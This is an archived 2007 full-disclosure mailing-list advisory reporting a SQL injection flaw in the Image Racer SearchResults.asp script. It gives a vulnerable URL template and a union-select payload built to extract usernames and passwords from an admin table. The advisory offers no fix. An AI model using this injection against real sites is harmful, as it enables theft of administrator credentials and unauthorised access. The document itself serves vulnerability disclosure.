Pantek Library

Hosting Provided By

CybrHost

High Speed Hosting

[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

From: <Advisory(at)Aria-Security.net>
Date: Sun Jul 22 2007 - 19:42:46 EDT

Aria-Security Team

Image Racer SearchResults.asp SQL Injection Vendor: http://www.junctionquest.com/Software.asp

Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1

Credits: Aria-Security Team
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info Received on Mon Jul 23 13:29:48 2007

This message: [ Message body ]
Next message: piercede(at)pdx.edu: "Re: Re: Internet Explorer 0day exploit"
Previous message: BlackHawk: "Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:09:56 EDT

Contact Us Legal Notices Order Services Online
Pantek Home Privacy Policy IT news Site Map Pantek Library